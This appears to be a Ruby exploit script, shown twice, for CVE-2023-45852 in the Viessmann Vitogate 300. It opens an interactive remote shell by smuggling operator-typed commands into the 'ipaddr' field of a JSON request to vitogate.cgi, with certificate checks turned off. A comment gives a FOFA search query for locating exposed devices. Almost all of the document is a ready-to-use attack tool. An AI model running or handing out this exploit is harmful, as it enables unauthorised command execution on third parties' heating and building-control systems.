komodoooo/v3r.rb

## v3r.rb
require 'http'
require 'openssl'
require 'json'

puts """
CVE-2023-45852
Viessmann Vitogate 300 RCE exploit
By komodo\n
"""

=begin

FOFA query to search vulnerable targets:
title="Vitogate 300"

=end

def main(url, cmd)
    url.delete_suffix!("/") unless url[-1..-1] != "/"
    @ctx = OpenSSL::SSL::SSLContext.new()
    @ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
    headerz=
    payload={:method=> "put",
            :form=>"form-4-8",
            :session=>"",
            :params=>{:ipaddr=>"sex123;#{cmd}"}}
    r=HTTP.post("#{url}/cgi-bin/vitogate.cgi", :headers=>{"Content-Type"=>"application/json"}, :json=>payload, :ssl_context=>@ctx)
    if r.code == 200
        puts JSON.parse(r.body.to_s.gsub("\n",""))["traceinfo"].split("Unknown host")[1]
    else
        puts "Not vulnerable! :(\n"
    end
end

begin
    print "Base URL: "
    target=gets.chomp
    while true
        print "\r$ "
        main(target, gets.chomp)
    end
rescue => e
    abort(e.to_s)
end
	require 'http'
	require 'openssl'
	require 'json'

	puts """
	CVE-2023-45852
	Viessmann Vitogate 300 RCE exploit
	By komodo\n
	"""

	=begin

	FOFA query to search vulnerable targets:
	title="Vitogate 300"

	=end

	def main(url, cmd)
	url.delete_suffix!("/") unless url[-1..-1] != "/"
	@ctx = OpenSSL::SSL::SSLContext.new()
	@ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
	headerz=
	payload={:method=> "put",
	:form=>"form-4-8",
	:session=>"",
	:params=>{:ipaddr=>"sex123;#{cmd}"}}
	r=HTTP.post("#{url}/cgi-bin/vitogate.cgi", :headers=>{"Content-Type"=>"application/json"}, :json=>payload, :ssl_context=>@ctx)
	if r.code == 200
	puts JSON.parse(r.body.to_s.gsub("\n",""))["traceinfo"].split("Unknown host")[1]
	else
	puts "Not vulnerable! :(\n"
	end
	end

	begin
	print "Base URL: "
	target=gets.chomp
	while true
	print "\r$ "
	main(target, gets.chomp)
	end
	rescue => e
	abort(e.to_s)
	end